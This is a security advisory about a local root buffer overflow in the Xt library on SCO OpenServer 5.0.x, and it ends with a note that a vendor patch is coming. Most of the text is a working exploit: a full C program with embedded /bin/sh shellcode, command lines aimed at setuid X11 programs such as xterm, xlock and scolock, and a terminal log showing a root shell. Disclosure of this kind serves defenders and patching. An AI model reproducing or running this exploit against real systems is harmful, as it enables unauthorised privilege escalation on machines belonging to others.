COMMAND

    Xt lib

SYSTEMS AFFECTED

    SCO 5.0.x

PROBLEM

    Brock  Tellier  found  following.   As  mentioned  in  an  earlier
    advisory, virtually  all of  SCO's programs  using the  Xt library
    are vulnerable  to a  local root  exploit.   The proofs of concept
    follow.  They all go something like this:

        scobox:/tmp_mnt/home/btellier$ uname -a
        SCO_SV scobox 3.2 5.0.5 i386
        scobox:/tmp_mnt/home/btellier$ id
        uid=136(btellier) gid=100(devel) groups=100(devel),998(www)
        scobox:/tmp_mnt/home/btellier$ xmcd -bg `./sco_xt -9000 2200`
        Generic SCO Xt library overflow program
          By Brock Tellier btellier@webley.com

        using jmp addr: 0x8047878
        Warning: Color name
        ...
        ...

        Warning: some arguments in previous message were lost
        #

    So, here's the code:

    /*
     * Generic SCO Xt library overflow program by Brock Tellier btellier@webley.com
     * Tested on SCO 5.0.5+Skunkware98
     * All programs using the Xt library are believed vulnerable
     *
       Compile gcc -o sco_xt sco_xt.c
       Usage: /usr/bin/X11/scolock -bg `./sco_xt -9000 2000`
              /usr/bin/X11/xmcd -bg `./sco_xt -8500 2000`
       /usr/bin/X11/xlock -bg `./sco_xt -8500 2000`
       /usr/bin/X11/xterm -bg `./sco_xt -9000 2000`

     * NOTE: xscreensaver and xload are vulnerable to the overflow but drop
     * privs before the overflow occurs.  Of course, they were suid auth so that
     * they could read /etc/shadow and thus your shellcode could exploit something
     * along those lines.  I got shells out of them by doing:
       /usr/bin/X11/xscreensaver -bg `./sco_xt -8404 2200`
       /usr/bin/X11/xload -bg `./sco_xt -8404 2200`
     */


    #include <stdlib.h>
    #include <stdio.h>

    char scoshell[]= /* doble@iname.com */
    "\xeb\x1b\x5e\x31\xdb\x89\x5e\x07\x89\x5e\x0c\x88\x5e\x11\x31\xc0"
    "\xb0\x3b\x8d\x7e\x07\x89\xf9\x53\x51\x56\x56\xeb\x10\xe8\xe0\xff"
    "\xff\xff/bin/sh\xaa\xaa\xaa\xaa\x9a\xaa\xaa\xaa\xaa\x07\xaa";


    #define LEN 10000
    #define NOP 0x90

    unsigned long get_sp(void) {

    __asm__("movl %esp, %eax");

    }


    int main(int argc, char *argv[]) {

    long int offset=0;

    int i;
    int buflen = LEN;
    long int addr;
    char buf[LEN];

    if(argc < 3) {
     fprintf(stderr, "Error: Usage: %s offset buffer\n", argv[0]);
     exit(0);
    }
    else {
     offset=atoi(argv[1]);
            buflen=atoi(argv[2]);
    }


    addr=get_sp();

    fprintf(stderr, "Generic SCO Xt library overflow program\n");
    fprintf(stderr, "By Brock Tellier btellier@webley.com\n\n");
    fprintf(stderr, "Using addr: 0x%x\n", addr-offset);


    memset(buf,NOP,buflen);
    memcpy(buf+(buflen/2),scoshell,strlen(scoshell));
    for(i=((buflen/2) + strlen(scoshell))+4;i<buflen-4;i+=4)
     *(int *)&buf[i]=addr-offset;

    for(i=0;i<buflen;i++)
     putchar(buf[i]);

    exit(0);
    }

SOLUTION

    SCO will  have a  patch for  OpenServer 5.0.5  in two weeks, which
    will be available from

        http://www.sco.com/security/